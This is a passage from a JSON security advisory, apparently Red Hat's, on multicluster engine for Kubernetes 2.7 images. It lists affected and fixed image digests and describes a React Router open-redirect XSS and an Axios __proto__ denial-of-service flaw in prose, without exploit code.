"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
